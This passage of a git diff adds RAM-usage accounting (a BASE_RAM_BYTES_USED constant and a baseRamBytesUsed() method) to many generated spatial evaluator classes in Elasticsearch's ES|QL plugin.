b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java index 467ff07588092..d672d06a2771d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StEnvelopeFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StEnvelopeFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StEnvelopeFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java index 2e4b8e7d538d8..62ce07e4dcd61 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohashFromFieldAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator in; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock inBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java index c67d7e4855299..b1cdd199289c2 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohashFromFieldAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator wkbBlock; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkbBlock.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock wkbBlockBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java index 862b2b90c9b2d..aecfacf2f63bf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java index a57c2559093bf..2a00d86f9770e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohashFromFieldDocValuesAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldDocValuesAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -46,6 +49,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java index 640a77fe05fb9..61f82764e525d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StGeohashToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashToLongFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeohashToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -103,6 +106,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java index 3e33f376e4e7e..440a2a6456d17 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StGeohashToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashToStringFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeohashToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -101,6 +104,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java index 24e070c46adda..90398d9e10005 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohexFromFieldAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator in; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock inBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java index 5209d32caf308..84b7af176bef4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohexFromFieldAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator wkbBlock; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkbBlock.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock wkbBlockBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java index 0ac32cbdbedad..fe03076f760d0 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java index 2b7d48d5f159d..63668c69bcc28 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeohexFromFieldDocValuesAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldDocValuesAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -46,6 +49,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java index 815b5c9cb9015..b04e0bdceef4e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StGeohexToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexToLongFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeohexToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -103,6 +106,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java index 9806e85ef6a48..ad5094b0de795 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StGeohexToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexToStringFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeohexToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -101,6 +104,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java index 13a8da4ad0c9c..dd1f3c28f8253 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeotileFromFieldAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator in; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock inBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java index f5b6f4b503373..a2c0f64dbbf1c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeotileFromFieldAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator wkbBlock; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkbBlock.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, BytesRefBlock wkbBlockBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java index c6dc1d23b9f3d..3cc470bae6de9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldDocValuesAndLiteralAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -47,6 +50,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java index 93acf7bd2badc..9d965914fbea8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileFromFieldDocValuesAndLiteralEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class StGeotileFromFieldDocValuesAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileFromFieldDocValuesAndLiteralEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator encoded; @@ -46,6 +49,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += encoded.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock encodedBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java index b99abc16e62f8..04ea23fdfbc64 100644 --- 